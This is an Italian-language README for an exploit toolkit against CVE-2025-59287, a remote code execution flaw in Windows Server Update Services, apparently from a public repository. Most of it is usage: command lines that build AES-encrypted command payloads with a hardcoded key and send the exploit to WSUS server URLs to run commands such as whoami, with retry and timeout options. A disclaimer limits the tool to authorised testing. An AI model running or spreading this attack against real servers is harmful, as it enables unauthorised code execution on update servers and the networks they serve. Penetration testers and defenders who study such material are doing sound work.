
Toolkit di sfruttamento per CVE-2025-59287 RCE in WSUS. Include crittografia del payload AES e un modulo di sfruttamento per test di penetrazione autorizzati.
CVE-2025-59287 - Toolkit di sfruttamento di WSUS
di adel-h4x0a
⚠️ Solo per scopi educativi e test autorizzati ⚠️
Panoramica
Questo toolkit dimostra lo sfruttamento di CVE-2025-59287, una vulnerabilità di esecuzione remota di codice in Windows Server Update Services (WSUS).
Componenti
· Crittografia del payload AES per la comunicazione WSUS · Supporto per modalità di crittografia legacy e sicure · Generazione di payload personalizzati
· Catena completa di sfruttamento per CVE-2025-59287 · Gestione robusta degli errori e logica di retry · Supporto per payload personalizzati
Struttura
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py # Modulo di crittografia
├── 📄 cve-2025-59287-exp.py # Modulo di sfruttamento
├── 📄 requirements.txt # Dipendenze
└── 📄 README.md # Questo file
Utilizzo
Prerequisiti
pip install -r requirements.txt
Crittografia
# Crittografia di base
python cve-2025-59287-encr.py --command "calc" --mode legacy
# Crittografia con chiave personalizzata
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"
# Salva output in file
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt
Sfruttamento
# Sfruttamento di base
python cve-2025-59287-exp.py http://wsus-server:8530
# Con payload personalizzato
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt
# Con impostazioni avanzate
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5
Opzioni
Modulo di crittografia (cve-2025-59287-encr.py)
· --key: Chiave AES in formato esadecimale (opzionale)
· --command: Comando da eseguire (default: calc)
· --mode: Modalità di crittografia [legacy, secure] (default: legacy)
· --output: File di output per salvare il payload (opzionale)
Modulo di sfruttamento (cve-2025-59287-exp.py)
· target: URL del server WSUS (obbligatorio) · --payload: File payload base64 personalizzato (opzionale) · --timeout: Timeout richiesta in secondi (default: 30) · --retries: Numero di tentativi di retry (default: 3) · --no-banner: Sopprime la visualizzazione del banner (opzionale)
Esempio completo
# Genera payload personalizzato
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt
# Esegui lo sfruttamento
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt
Dichiarazione legale
❗ Avviso importante:
Questo strumento è fornito solo per scopi educativi e test di penetrazione autorizzati. L'uso non autorizzato contro sistemi di cui non si possiede o non si ha esplicita autorizzazione per testare è illegale.
Questo strumento dovrebbe essere utilizzato solo in:
· Ambienti di test di tua proprietà · Sistemi per i quali hai ottenuto autorizzazione scritta per testare · Scopi educativi e accademici
Lo sviluppatore non è responsabile per qualsiasi uso illegale o non autorizzato di questo strumento.
Licenza
Questo progetto è concesso in licenza secondo i termini della Licenza MIT.
Aggiornamenti
· v1.0: Versione iniziale con supporto completo per lo sfruttamento · v1.1: Gestione degli errori migliorata e miglioramenti nella registrazione
Contributi
Segnalazioni di bug e pull request sono incoraggiate per migliorare lo strumento nell'ambito di un utilizzo responsabile ed etico.
Nota: Ottieni sempre autorizzazione scritta prima di testare qualsiasi sistema. La consapevolezza della sicurezza inizia con la responsabilità. 🔒